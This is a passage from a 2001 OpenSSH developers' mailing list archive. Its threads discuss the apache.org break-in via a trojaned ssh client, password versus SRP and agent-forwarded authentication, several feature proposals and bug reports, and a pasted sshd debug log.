> > > > The question is, can password authentication be (securely) > > forwarded? If > > not, then we really should remove password authentication as > > an option. > > > From jason at shalott.net Fri Jun 1 23:59:13 2001 From: jason at shalott.net (Jason Stone) Date: Fri, 1 Jun 2001 06:59:13 -0700 (PDT) Subject: Disabling Password-based auth? (was RE: recent breakins) In-Reply-To: <791BD3CB503DD411A6510008C7CF647701F40BE0@col-581-exs01.cist.saic.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 > But it's not as simple as forwarding the password-based > authentication. Regardless of what method was used to SSH from system > one (user's) to system two (SF), the user then started up *a second* > SSH session to go from two (SF) to three (Apache). There is no > effective way for any authentication information from the first > session to be passed to the second, in my mind. > > Remember that the SF servers had suffered a root compromise--so any > non-password-based authentication that would allow the user on the SF > system to get to the Apache systems could have been equally > compromised. That's exactly the point of SRP (well, one of the points) - it takes care of that - even if the host in the middle has been compromised and the attacker is sniffing all the ttys or something One can imagine other ways of ssh'ing through multiple systems without giving away passwords to the intermediate hosts. A trivial example - instead of saying "ssh -t host1 ssh host2" we can say instead "ssh -f -L 2222:host2:22 host1 'sleep 999999'; ssh -p 2222 localhost" - the latter commandline never allows host1 to see the plaintext of your password/key/whatever for host2. -Jason --------------------------- If the Revolution comes to grief, it will be because you and those you lead have become alarmed at your own brutality. --John Gardner -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: See https://private.idealab.com/public/jason/jason.gpg iD8DBQE7F5+1swXMWWtptckRAkBZAKCsXTzgmEebtaXiLaDiGfJwQVaqbACgpN2N zPTJ9c7I+aKTnR/RnFUqw0w= =TlgR -----END PGP SIGNATURE----- From Markus.Friedl at informatik.uni-erlangen.de Sat Jun 2 00:10:34 2001 From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Fri, 1 Jun 2001 16:10:34 +0200 Subject: Disabling Password-based auth? (was RE: recent breakins) In-Reply-To: ; from jason@shalott.net on Fri, Jun 01, 2001 at 06:59:13AM -0700 References: <791BD3CB503DD411A6510008C7CF647701F40BE0@col-581-exs01.cist.saic.com> Message-ID: <20010601161034.D16295@faui02.informatik.uni-erlangen.de> On Fri, Jun 01, 2001 at 06:59:13AM -0700, Jason Stone wrote: > That's exactly the point of SRP (well, one of the points) - it takes care > of that - even if the host in the middle has been compromised and the > attacker is sniffing all the ttys or something but the attack involved trojan ssh clients, so SRP does not help at all, whereas agent forwarded pubkey auth would have improved the situtations for the 'victims'. -m From douglas.manton at uk.ibm.com Sat Jun 2 00:10:57 2001 From: douglas.manton at uk.ibm.com (douglas.manton at uk.ibm.com) Date: Fri, 1 Jun 2001 15:10:57 +0100 Subject: Disabling Password-based auth? (was RE: recent breakins) Message-ID: <80256A5E.004DE0F8.00@d06mta05.portsmouth.uk.ibm.com> > There is no effective > way for any authentication information from the first > session to be passed to the second, in my mind. SSH agent forwarding allows authentication challenges to be securely forwarded back to your local machine. The intermediary client acts as a proxy and does not benefit from watching the authentication challenge/response pass by. Of course, it does then have access to the remote machine for that session. The trojan SSH client could always take this opportunity to add another public key to allow 3rd party access... -------------------------------------------------------- Doug Manton, AT&T EMEA Commercial Security Solutions E: demanton at att.com -------------------------------------------------------- "If privacy is outlawed, only outlaws will have privacy" From brianc at palaver.net Sat Jun 2 04:01:48 2001 From: brianc at palaver.net (Brian Capouch) Date: Fri, 01 Jun 2001 13:01:48 -0500 Subject: libcrypt vs libcrypto Message-ID: <3B17D88C.8343FA9B@palaver.net> Upgrading my ssh from 2.3 to 2.9p1, and I find I am now linking against libcrypt.so.* instead of libcrypto.so.* I get a fatal indicating that I've built against one version of SSL but am trying to run against another. Reverting back to 2.3 shows the different library link. Trying to figure out how to force it to link with the right library. Thanks. B. From dwd at bell-labs.com Sat Jun 2 04:01:27 2001 From: dwd at bell-labs.com (Dave Dykstra) Date: Fri, 1 Jun 2001 13:01:27 -0500 Subject: recent breakins In-Reply-To: ; from tomh@po.crl.go.jp on Fri, Jun 01, 2001 at 05:52:50PM +0900 References: <20010601101256.B22854@greenie.muc.de> Message-ID: <20010601130126.A1806@lucent.com> On Fri, Jun 01, 2001 at 05:52:50PM +0900, Tom Holroyd wrote: > On Fri, 1 Jun 2001, Gert Doering wrote: > > > On Fri, Jun 01, 2001 at 11:24:49AM +0900, Tom Holroyd wrote: > > > But what about multiple links? It should be possible to forward > > > authentication requests back to the user's keyboard. The SRP protocol can > > > be forwarded over any number of links, *even through a trojaned ssh* > > > without revealing any information that a cracker can use. > > > > Same with agent forwarding and using RSAAuthentication. > > True. Too bad the guy wasn't using it. Why wasn't he using it? > > Perhaps OpenSSH should simply disallow password authentication? > > This type of man-in-the-middle attack (trojaned ssh) is not theoretical > anymore, and password authentication is broken. > > The question is, can password authentication be (securely) forwarded? If > not, then we really should remove password authentication as an option. No. That would only make breakins a little harder but it is in no way fundamentally more secure. Here is Dykstra's law of computer security: If any host is broken into, NO MATTER WHAT AUTHENTICATION MECHANISM IS USED to connect from there to a second host, the second host can also be broken into. In this case, since the ssh client on sourceforge was compromised, the cracker could have inserted other commands into the command datastream, for example commands to insert his own ~/.ssh/authorized_keys entry on the server. True, it's slightly harder than just saving a password but as soon as one hole is closed someone clever will just make a script to use the next level hole. Here's the corollary to Dykstra's law: The only way to improve the security of computer systems is to insure that ALL hosts that are used to connect between each other are completely secured against break-in. It was unwise of the Apache foundation developer to connect to another machine through a host that he or she was not completely confident of. - Dave Dykstra From dwd at bell-labs.com Sat Jun 2 04:24:01 2001 From: dwd at bell-labs.com (Dave Dykstra) Date: Fri, 1 Jun 2001 13:24:01 -0500 Subject: Why does prng always need to run the ssh_prng_cmds? Message-ID: <20010601132401.A2115@lucent.com> This question is primarily for Damien, but if anybody else knows the answer please chime in. Why is it that on systems with no /dev/random or PRNGD or EGD (and I have a lot of Solaris systems in this situation because I don't have root access on them) that the OpenSSH 'ssh' command has to run through all those ssh_prng_cmds every time it starts up? Why doesn't ~/.ssh/prng_seed give it enough initial entropy? The old SSH 1.2.27 'ssh' command got away with using only ~/.ssh/random_seed, which it initializes by running a lot of system commands the first time it is run. Was that not secure enough? I don't recall seeing anybody claiming it wasn't. I can't see why it wouldn't be secure, because if you assume the client machine hasn't been compromised (and able to observe the seed file) there should be no way that a cracker should be able to guess what number will be chosen in the future just by observing the numbers that are being chosen in the past and transferred over the wire. If there's no fundamental reason why it can't be done that way and you'd consider accepting a patch, I'll work on it. - Dave Dykstra From vader at conflict.net Sat Jun 2 15:27:18 2001 From: vader at conflict.net (Jim Breton) Date: Sat, 2 Jun 2001 05:27:18 +0000 Subject: pam_opie Message-ID: <20010602052718926722.4895@conflict.net> Hi, did a search in the archives for "opie" and this is the most recent message on the topic I see: http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=98536878202858&w=2 Nigel, would you mind sending me the source for the module you've extracted from that other distribution? Also, if anyone is interested in looking at other OPIE PAM modules, here are two more: Andy Berkheimer (I've been using this one for over a year with non-ssh-related authentications, but have so far not been able to make it work with OpenSSH): http://www.tho.org/~andy/pam-opie.html Chris Evans: ftp://ferret.lmh.ox.ac.uk/users/chris/ Thanks. -- Jim B. vader at conflict.net From tomh at po.crl.go.jp Sat Jun 2 17:26:54 2001 From: tomh at po.crl.go.jp (Tom Holroyd) Date: Sat, 2 Jun 2001 16:26:54 +0900 (JST) Subject: Disabling Password-based auth? (was RE: recent breakins) In-Reply-To: <20010601161034.D16295@faui02.informatik.uni-erlangen.de> Message-ID: On Fri, 1 Jun 2001, Markus Friedl wrote: > On Fri, Jun 01, 2001 at 06:59:13AM -0700, Jason Stone wrote: > > That's exactly the point of SRP (well, one of the points) - it takes care > > of that - even if the host in the middle has been compromised and the > > attacker is sniffing all the ttys or something > > but the attack involved trojan ssh clients, so SRP does not > help at all, whereas agent forwarded pubkey auth would have > improved the situtations for the 'victims'. The SRP _protocol_ can be forwarded across a trojaned ssh, and not leak info, which is better than vanilla passwords. Of course the current SRP _implementation_ doesn't work that way, so you're right. But there's nothing wrong with SRP itself. The problem is that the current forwarding architecture can't deal with the SRP protocol. If it could, then it would be safer to use remote ssh clients with passwords. Dykstra's problem can be solved, too. As he mentioned, a clever trojan could still be built -- it wouldn't get the password but it could still insert commands into the outgoing channel that would backdoor the user's account, or forward the established connection to an active attacker; BUT, if the authentication used forwarded SRP, _and_ if the session keys were switched to the new shared secret generated as a byproduct of the SRP authentication, then the MITM would get zilch. I agree that user education could be improved. Right now it's easy for users to believe that they are safe but still shoot themselves by accident without knowing it. Sending a cleartext password to a remote ssh is not safe (vanilla or SRP). There are systems out there being cracked right now because of this. The way that ssh clients ask for passwords could be changed. They should not just open /dev/tty, they should go back upstream to the originating host, and open /dev/tty there. It would be even better if this could be done without the agent. The biggest problem I see with this is that when a user on host0 sees: host1% ssh host2 Enter user at host2's SRP password: he or she really has no way to tell if that prompt is being issued by host1 or by the local host0 client... If they're running X or similar you could pop up a window, but that's not a general solution. From pekkas at netcore.fi Sat Jun 2 18:54:24 2001 From: pekkas at netcore.fi (Pekka Savola) Date: Sat, 2 Jun 2001 11:54:24 +0300 (EEST) Subject: authorized_keys2 directory idea Message-ID: Hi, In a mail about two weeks ago, I brought up an idea: --- How SSH makes this easier is that you only have to sync the authorized_keys2 database to root account's .ssh/ every time new admin comes in/leaves the house. This can even be automatized rather easily. A more modular hack would be using authorized_keys2 _directory_, and the keys in there would all be counted as authorized. Thus only one file copy/removal would do the job, no need for sync; this would be profitable in environments where all admins don't have access to all systems. --- Root would not be the only one to profit from this; you would only need to copy the pubkey file in the right dir (with a descriptive name if you like!), and authorization would work without file editing. Also, if you need to refresh just one key, you could just scp that one over, no need to edit the file either. The more I think of this, this sounds more and more like a nice feature to have :-). It'd probably be better be like .ssh/authorized_keys.d/ or the like, I suppose. What do you think -- would this be useful? Bloat? Could it be considered to be merged if it was implemented? I made some preliminary checking, and I don't think this would add too much new code; look up all files in the directory, disqualify those with odd characters in them (e.g. allow [0-9a-zA-Z_. at -]) , insert the rest to current key check method one by one until a matching key is found. Btw, I noticed when comparing auth-rsa.c/auth2.c that auth2.c does not print debug message: --- openssh-cvs/auth2.c Sat Jun 2 11:14:21 2001 +++ openssh.fix/auth2.c Sat Jun 2 11:13:40 2001 @@ -26,6 +28,8 @@ if (!f) { /* Restore the privileged uid. */ restore_uid(); + packet_send_debug("Could not open %.900s for reading.", file); + packet_send_debug("If your home is on an NFS volume, it may need to be world-readable."); return 0; } if (options.strict_modes) { was this left out by design, or a leftover in auth-rsa.c ? -- Pekka Savola "Tell me of difficulties surmounted, Netcore Oy not those you stumble over and fall" Systems. Networks. Security. -- Robert Jordan: A Crown of Swords From _nuub at yahoo.com Sat Jun 2 19:26:38 2001 From: _nuub at yahoo.com (nuuB) Date: Sat, 2 Jun 2001 02:26:38 -0700 (PDT) Subject: Recent breakins / SSHD root hole? Message-ID: <20010602092638.38588.qmail@web11205.mail.yahoo.com> The trojaned ssh client is nothing new to the hacker community, and the statement in the previous thread claiming "This type of man-in-the-middle attack (trojaned ssh) is not theoretical anymore, and password authentication is broken." is an example of how many poeple still think "hacking" is something very difficult and nothing short of a genius is required to make the transition from theoretical to practical. It is probably the medias fault that these misconeptions are so widely spread. In this case it is just a matter of extending the program to do a small task besides the regular tasks (i.e to save all passwords entered in a file). The patch is probably about 10 to 15 lines of code, and was done in 10 minutes. Not that the cracker would have to have written it himself - there has been patches for ssh backdoors in wide circulation since ssh came out. "Password authentication" has probably been "broken" since it was first introduced. I am quite sure that the hackers back at M.I.T knew how to trojan their telnet clients. But I digress. The reason for this post something mentioned in the apache.org statement: "The ssh client at SourceForge had been compromised to log outgoing names and passwords, so the cracker was thus able get a shell on apache.org. After unsuccessfully attempting to get elevated privileges using an old installation of Bugzilla on apache.org, the cracker used a weakness in the ssh daemon (OpenSSH 2.2) to gain root privileges." Trojaned ssh clients is nothing new. But what about this "weakness" in the daemon that was used to gain root privileges? What is it about? Has it been fixed in later versions? Is it remotely exploitable (doesn't sound likely, as then the cracker wouldn't have had gone through the trouble to sniff a valid password on sourceforge - unless this particular hole requires a valid user/pasword pair). Basically what I'd like to know is: What version of the OpenSSH daemon would I need to run in order NOT to be vulnerable to this "weakness"? nuuB __________________________________________________ Do You Yahoo!? Get personalized email addresses from Yahoo! Mail - only $35 a year! http://personal.mail.yahoo.com/ From kris at obsecurity.org Sun Jun 3 07:31:53 2001 From: kris at obsecurity.org (Kris Kennaway) Date: Sat, 2 Jun 2001 14:31:53 -0700 Subject: Recent breakins / SSHD root hole? In-Reply-To: <20010602092638.38588.qmail@web11205.mail.yahoo.com>; from _nuub@yahoo.com on Sat, Jun 02, 2001 at 02:26:38AM -0700 References: <20010602092638.38588.qmail@web11205.mail.yahoo.com> Message-ID: <20010602143153.A7257@xor.obsecurity.org> On Sat, Jun 02, 2001 at 02:26:38AM -0700, nuuB wrote: > Trojaned ssh clients is nothing new. But what about this "weakness" in the > daemon that was used to gain root privileges? What is it about? Has it been > fixed in later versions? Is it remotely exploitable (doesn't sound likely, as > then the cracker wouldn't have had gone through the trouble to sniff a valid > password on sourceforge - unless this particular hole requires a valid > user/pasword pair). > > Basically what I'd like to know is: What version of the OpenSSH daemon would I > need to run in order NOT to be vulnerable to this "weakness"? Sounds like ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-00:30.openssh.asc Kris -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 230 bytes Desc: not available Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20010602/fd5ed982/attachment.bin From kris at obsecurity.org Sun Jun 3 07:33:44 2001 From: kris at obsecurity.org (Kris Kennaway) Date: Sat, 2 Jun 2001 14:33:44 -0700 Subject: pam_opie In-Reply-To: <20010602052718926722.4895@conflict.net>; from vader@conflict.net on Sat, Jun 02, 2001 at 05:27:18AM +0000 References: <20010602052718926722.4895@conflict.net> Message-ID: <20010602143344.B7257@xor.obsecurity.org> On Sat, Jun 02, 2001 at 05:27:18AM +0000, Jim Breton wrote: > Hi, did a search in the archives for "opie" and this is the most recent > message on the topic I see: > > http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=98536878202858&w=2 > > Nigel, would you mind sending me the source for the module you've > extracted from that other distribution? There's a BSD-licensed pam_opie here which works well with OpenSSH: http://www.FreeBSD.org/cgi/cvsweb.cgi/src/lib/libpam/modules/pam_opie/ Kris -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 230 bytes Desc: not available Url : http://lists.mindrot.org/pipermail/openssh-unix-dev/attachments/20010602/d3e538f4/attachment.bin From auto92089 at hushmail.com Sun Jun 3 08:02:04 2001 From: auto92089 at hushmail.com (auto92089 at hushmail.com) Date: Sat, 2 Jun 2001 16:02:04 -0600 (CDT) Subject: ssh-keygen(1) misinfo: English prose entropy 0.6 - 1.3 b/char! Message-ID: <200106022138.OAA26245@user3.hushmail.com> Quoth manpage: otherwise easily guessable (English prose has only 1-2 bits of entropy per word, and provides very bad passphrases). The passphrase can be Whoever wrote that manpage is either possessed of some amazing human insight to which I am not privvy, chose a very non-representative sample of English prose, or is just plain wrong. I know none of you would ever make such a glaring error, and should anyone remotely associated with you have done so, it must have been due to acute sleep deprivation or near-toxic levels of caffeine, the latter being more conducive to errors of commision, so please fix it before it spreads via the "reference" effect or simply tarnishes your image. Should I be in greivous hallucinatory error, the aforementioned common-sense defying measurement necessitates a gold-plated reference beyond reproach with which to rain smack down upon the non-believers and other intellectual trilobites. For verification: 1) do a quick web search 2) read Shannon's experiment 3) Cover an unseen word in an ordinary book and see if you can guess it correctly every second to fourth time. Consider a lucrative career in cryptanalysis if you are consistently successful... I, Zone Lee Free, encrypted, secure Web-based email at www.hushmail.com From pekkas at netcore.fi Sun Jun 3 08:11:12 2001 From: pekkas at netcore.fi (Pekka Savola) Date: Sun, 3 Jun 2001 01:11:12 +0300 (EEST) Subject: ssh-keygen(1) misinfo: English prose entropy 0.6 - 1.3 b/char! In-Reply-To: <200106022138.OAA26245@user3.hushmail.com> Message-ID: On Sat, 2 Jun 2001 auto92089 at hushmail.com wrote: > For verification: > 1) do a quick web search > 2) read Shannon's experiment > 3) Cover an unseen word in an ordinary book and see if you > can guess it correctly every second to fourth time. Consider > a lucrative career in cryptanalysis if you are consistently > successful... Trolling is such fun, isn't it? Entropy rate does not mean that; if you are shown an English word, character by character, how long does it take to guess the whole word? Try a couple of them: moro_ idio_ trol_ Not so hard is it? I'm sure Snake Oil Security Co. is looking for new cryptanalysts; consider applying. -- Pekka Savola "Tell me of difficulties surmounted, Netcore Oy not those you stumble over and fall" Systems. Networks. Security. -- Robert Jordan: A Crown of Swords From deumens at qtp.ufl.edu Sun Jun 3 11:56:21 2001 From: deumens at qtp.ufl.edu (Erik Deumens) Date: Sat, 2 Jun 2001 21:56:21 -0400 (EDT) Subject: OpenSSH 2.9p1 on Solaris 7 x86 problems Message-ID: <200106030156.VAA10229@qtp.ufl.edu> Dear sir- I have been trying to build and run OpenSSH 2.9p1 on Solaris 7 for x86. I tried with SunPRO 5.0 compilers and gcc 2.95.2. I am using zlib 1.1.3 and openssl-0.9.6a. In all cases I can get ssh to work for version 1. In no case can I get version 2 to connect. With the SunPRO 5.0 compiler the signature does not verify, with gcc, ssh dies in segmentation violation. I can provide more details, if you wish. I use no special options in configure. Thanks for any help or pointers, Erik +--------------------------------------------------------------------+ | Dr. Erik Deumens | | Director of Computing | | Institute for Theory and Computation | | in Molecular and Materials Sciences | | Department of Chemistry Department of Physics | | | | Quantum Theory Project deumens at qtp.ufl.edu | | New Physics Building 2334 http://www.qtp.ufl.edu/~deumens | | University of Florida (352)392-6980 | | Gainesville, Florida 32611-8435 FAX (352)392-8722 | +--------------------------------------------------------------------+ From raj at cerias.purdue.edu Sun Jun 3 13:19:19 2001 From: raj at cerias.purdue.edu (Brian Poole) Date: Sat, 2 Jun 2001 22:19:19 -0500 Subject: Handling of password & account expirations Message-ID: <20010602221919.M25314@basm.cerias.purdue.edu> Hello, There has been an annoyance with OpenSSH that has been bugging me lately. It pays no attention to pw_change and pw_expire fields from the passwd file for users by default. Thus even if the admin has set a user's account to expire 5 days ago they can still login. So one might say, just add 'UseLogin yes' and all of your problems will be solved. This of course is not a good answer, because as has been noted recently on the list and is mentioned in the man page, UseLogin does not affect remote command execution, thus people can still use scp, sftp or just execute random shell commands. It would be simplistic to regain access to one's account, even if it was expired and UseLogin set to yes IMO. A few remote commands and you could upload an alternate way of logging in with an interactive account. This defeats the entire purpose of account & password expiration IMO and should be fixed immediately. Since no one else has seemed concerned about this when I posted it on the OpenBSD mailing lists I have written a patch to attempt to address the problem myself. This has already been submitted to bugs at openbsd several days ago, but met no response, thus I'm submitting it here as well (probably proper procedure in the first place). Patch is available at: http://www.cerias.purdue.edu/homes/rajak/openbsd/patch_exp-support The changes are minor, should not add any significant overhead and seem to be the right thing to do in any case. I would personally like to see a sshd config option that allowed customizable warning times, which I added in session.c (very similar to how login does it) with a -fixed- time (1 week), but I do not want to waste more time writing patches if they are just going to be ignored. Looking forward to some response/feedback, -b From markus.friedl at informatik.uni-erlangen.de Sat Jun 2 18:28:54 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Sat, 2 Jun 2001 10:28:54 +0200 Subject: another bug report In-Reply-To: ; from mugz@x-mafia.org on Fri, Jun 01, 2001 at 02:09:57AM -0400 References: <20010524125150.D22475@folly> Message-ID: <20010602102854.F14694@folly> can you start $ sshd -d -d -d -p 1234 and connect to port 1234 with securecrt? the traces could be of use to us. On Fri, Jun 01, 2001 at 02:09:57AM -0400, mugz wrote: > > I tracked this one down. I am running OpenSSH_2.9p1 and if a user logs in > whith securecrt and uses the "disconect" button to disconnect from the > shell I get this error in the log: > > Jun 1 01:47:35 members sshd[16130]: error: session_close_by_channel: kill > 16131: Operation not permitted > Jun 1 01:47:35 members sshd[16130]: error: session_close_by_channel: kill > 16131: Operation not permitted > > Also, when I type: > > last -30 | grep still > > It shows them as still logged in, even though they have long sense > disconnected. This error does not occur if they use "exit" to exit the > shell, also I do not see this same error in PuTTY. > > mugz > > From markus.friedl at informatik.uni-erlangen.de Sat Jun 2 18:21:30 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Sat, 2 Jun 2001 10:21:30 +0200 Subject: primes In-Reply-To: <20010531131947.A258@bootp-20-219.bootp.virginia.edu>; from mipam@ibb.net on Thu, May 31, 2001 at 01:19:47PM -0400 References: <20010222111114.A4248@bootp-20-219.bootp.virginia.edu> <20010222171024.A1229@faui02.informatik.uni-erlangen.de> <20010222113220.C4248@bootp-20-219.bootp.virginia.edu> <20010222173409.A3276@faui02.informatik.uni-erlangen.de> <20010222114441.F4248@bootp-20-219.bootp.virginia.edu> <20010222175932.A3510@faui02.informatik.uni-erlangen.de> <20010318020636.A250@bootp-20-219.bootp.virginia.edu> <20010318124133.C23502@folly> <20010531131947.A258@bootp-20-219.bootp.virginia.edu> Message-ID: <20010602102130.B14694@folly> hi, openssh's make install does copy the provided prime file to /etc/primes. what distributions are broken? On Thu, May 31, 2001 at 01:19:47PM -0400, Mipam wrote: > I notice that a lot of openssh ports are installed without an /etc/primes. > Not the fault of openssh, merely of the ppl who make a rpm, or port > openssh nativly in the os. > And when another machine makes a connection to a sshd, the server tries to find > an /etc/primes. Also in my case there is none. > In the documentation there is hardly anything mentioned other then > "Contains Diffie-Helman groups used for the ...." > No note how to generate the primes file or whether it is a file that > comes with the openssh source which you must manually plant in /etc > for example. So i dont know what to do now, since i am not that much home > in this subject, should i try to obtain a primes file somewhere, > or should i generate a primes file, and if so, how? > Bye, > > Mipam. From markus.friedl at informatik.uni-erlangen.de Sun Jun 3 19:46:04 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Sun, 3 Jun 2001 11:46:04 +0200 Subject: authorized_keys2 directory idea In-Reply-To: ; from pekkas@netcore.fi on Sat, Jun 02, 2001 at 11:54:24AM +0300 References: Message-ID: <20010603114604.B24416@folly> On Sat, Jun 02, 2001 at 11:54:24AM +0300, Pekka Savola wrote: > Root would not be the only one to profit from this; you would only need to > copy the pubkey file in the right dir (with a descriptive name if you > like!), and authorization would work without file editing. Also, if you > need to refresh just one key, you could just scp that one over, no need > to edit the file either. i don't understand why editing a file is hard. i think keeping a file in sync is simpler than syncing directories, especially deleting files. > What do you think -- would this be useful? Bloat? Could it be considered > to be merged if it was implemented? i don't think it's useful. ssh.com switched to a-key-per-file, but openssh and the traditional ssh use a-key-per-line and i don't want to support 2 different ways of doing things. > Btw, I noticed when comparing auth-rsa.c/auth2.c that auth2.c does not > print debug message: > --- openssh-cvs/auth2.c Sat Jun 2 11:14:21 2001 > +++ openssh.fix/auth2.c Sat Jun 2 11:13:40 2001 > @@ -26,6 +28,8 @@ > if (!f) { > /* Restore the privileged uid. */ > restore_uid(); > + packet_send_debug("Could not open %.900s for reading.", file); > + packet_send_debug("If your home is on an NFS volume, it may need to be world-readable."); > return 0; > } > if (options.strict_modes) { > > was this left out by design, or a leftover in auth-rsa.c ? they should be merged, and in the future, i don't want to see debug messages before a user is authenticated. From markus.friedl at informatik.uni-erlangen.de Sun Jun 3 20:49:19 2001 From: markus.friedl at informatik.uni-erlangen.de (Markus Friedl) Date: Sun, 3 Jun 2001 12:49:19 +0200 Subject: Handling of password & account expirations In-Reply-To: <20010602221919.M25314@basm.cerias.purdue.edu>; from raj@cerias.purdue.edu on Sat, Jun 02, 2001 at 10:19:19PM -0500 References: <20010602221919.M25314@basm.cerias.purdue.edu> Message-ID: <20010603124919.A14824@folly> On Sat, Jun 02, 2001 at 10:19:19PM -0500, Brian Poole wrote: > Since no one else has seemed concerned about this when I posted it on > the OpenBSD mailing lists i wrote: % On Mon, May 14, 2001 at 03:20:57PM -0500, Brian Poole wrote: % > My problem is this, OpenSSH does not respect account nor password % > expirations by default (by respect I mean it totally ignores them, % > it doesn't matter if they are set and have expired). Why? % > % > [...] % > % > This entire bit probably applies to rsh/rlogin as well, but I'm not % > nearly as concerned about it as it isn't on by default nor used by % > myself. % % both openssh and rlogin ignore this, so this suggests % the the operating system does not support this feature % at all. % % however, in the future openbsd will move to BSD_AUTH, so % perhaps this feature will be supported on openbsd. and indeed, this is handled by auth_approval in session.c if BSD_AUTH is defined. -m From mugz at x-mafia.org Mon Jun 4 02:31:48 2001 From: mugz at x-mafia.org (mugz) Date: Sun, 3 Jun 2001 12:31:48 -0400 (EDT) Subject: another bug report In-Reply-To: <20010602102854.F14694@folly> Message-ID: OK, I know some mailing lists dont like attachments, so I did as you asked and have pasted the log to the end of this message. It is the log of a user logging in with secureCRT and using the "disconnect" button to exit the shell: On Sat, 2 Jun 2001, Markus Friedl wrote: > can you start > $ sshd -d -d -d -p 1234 > and connect to port 1234 with securecrt? > > the traces could be of use to us. > > > On Fri, Jun 01, 2001 at 02:09:57AM -0400, mugz wrote: > > > > I tracked this one down. I am running OpenSSH_2.9p1 and if a user logs in > > whith securecrt and uses the "disconect" button to disconnect from the > > shell I get this error in the log: > > > > Jun 1 01:47:35 members sshd[16130]: error: session_close_by_channel: kill > > 16131: Operation not permitted > > Jun 1 01:47:35 members sshd[16130]: error: session_close_by_channel: kill > > 16131: Operation not permitted > > > > Also, when I type: > > > > last -30 | grep still > > > > It shows them as still logged in, even though they have long sense > > disconnected. This error does not occur if they use "exit" to exit the > > shell, also I do not see this same error in PuTTY. > > > > mugz > > > > > debug1: Seeding random number generator debug1: sshd version OpenSSH_2.9p1 debug1: private host key: #0 type 0 RSA1 debug3: No RSA1 key file /etc/ssh/ssh_host_rsa_key. debug1: read PEM private key done: type RSA debug1: private host key: #1 type 1 RSA debug3: No RSA1 key file /etc/ssh/ssh_host_dsa_key. debug1: read PEM private key done: type DSA debug1: private host key: #2 type 2 DSA socket: Address family not supported by protocol debug1: Bind to port 1234 on 0.0.0.0. Server listening on 0.0.0.0 port 1234. debug1: Server will not fork when running in debugging mode. Connection from 137.79.89.118 port 1330 debug1: Client protocol version 2.0; client software version 3.0 SecureCRT (tm), a product of Van Dyke Technologies, Inc. debug1: match: 3.0 SecureCRT (tm), a product of Van Dyke Technologies, Inc. pat ^3\.0 SecureCRT Enabling compatibility mode for protocol 2.0 debug1: Local version string SSH-2.0-OpenSSH_2.9p1 debug1: Rhosts Authentication disabled, originating port not trusted. debug1: list_hostkey_types: ssh-rsa,ssh-dss debug1: SSH2_MSG_KEXINIT sent debug1: SSH2_MSG_KEXINIT received debug2: kex_parse_kexinit: diffie-hellman-group-exchange-sha1,diffie-hellman-group1-sha1 debug2: kex_parse_kexinit: ssh-rsa,ssh-dss debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,rijndael-cbc at lysator.liu.se debug2: kex_parse_kexinit: aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour,aes192-cbc,aes256-cbc,rijndael128-cbc,rijndael192-cbc,rijndael256-cbc,rijndael-cbc at lysator.liu.se debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160 at openssh.com,hmac-sha1-96,hmac-md5-96 debug2: kex_parse_kexinit: hmac-md5,hmac-sha1,hmac-ripemd160,hmac-ripemd160 at openssh.com,hmac-sha1-96,hmac-md5-96 debug2: kex_parse_kexinit: none,zlib debug2: kex_parse_kexinit: none,zlib debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: first_kex_follows 0 debug2: kex_parse_kexinit: reserved 0 debug2: kex_parse_kexinit: diffie-hellman-group1-sha1 debug2: kex_parse_kexinit: ssh-dss debug2: kex_parse_kexinit: 3des-cbc debug2: kex_parse_kexinit: 3des-cbc debug2: kex_parse_kexinit: hmac-md5 debug2: kex_parse_kexinit: hmac-md5 debug2: kex_parse_kexinit: none debug2: kex_parse_kexinit: none debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: debug2: kex_parse_kexinit: first_kex_follows 0 debug2: kex_parse_kexinit: reserved 0 debug2: mac_init: found hmac-md5 debug1: server_init_dispatch_20 debug1: server_input_channel_open: ctype session rchan 0 win 8192 max 8192 debug1: input_session_request debug1: channel 0: new [server-session] debug1: session_new: init debug1: session_new: session 0 debug1: session_open: channel 0 debug1: session_open: session 0: link with channel 0 debug1: server_input_channel_open: confirm session debug2: callback start debug1: session_by_channel: session 0 channel 0 debug1: session_input_channel_req: session 0 channel 0 request pty-req reply 0 debug1: session_pty_req: session 0 alloc /dev/pts/2 debug2: tty_parse_modes: SSH2 n_bytes 46 debug2: tty_parse_modes: 1 3 debug2: tty_parse_modes: 5 4 debug2: tty_parse_modes: 4 21 debug2: tty_parse_modes: 8 17 debug2: tty_parse_modes: 9 19 debug2: tty_parse_modes: 10 26 debug2: tty_parse_modes: 12 18 debug2: tty_parse_modes: 13 23 debug2: tty_parse_modes: 14 22 debug2: callback done debug2: callback start debug1: session_by_channel: session 0 channel 0 debug1: session_input_channel_req: session 0 channel 0 request shell reply 0 debug1: channel 0: rfd 7 isatty debug1: fd 7 setting O_NONBLOCK debug1: fd 3 IS O_NONBLOCK debug2: callback done debug1: Setting controlling tty using TIOCSCTTY. debug1: channel 0: rcvd close debug1: channel 0: output open -> drain debug1: channel 0: input open -> closed debug1: channel 0: close_read debug2: channel 0: no data after CLOSE debug1: channel 0: obuf empty debug1: channel 0: output drain -> closed debug1: channel 0: close_write debug1: channel 0: send close debug1: channel 0: is dead debug1: channel_free: channel 0: status: The following connections are open: #0 server-session (t4 r0 i8/0 o128/0 fd -1/-1) debug1: channel_free: channel 0: dettaching channel user debug1: session_by_channel: session 0 channel 0 debug1: 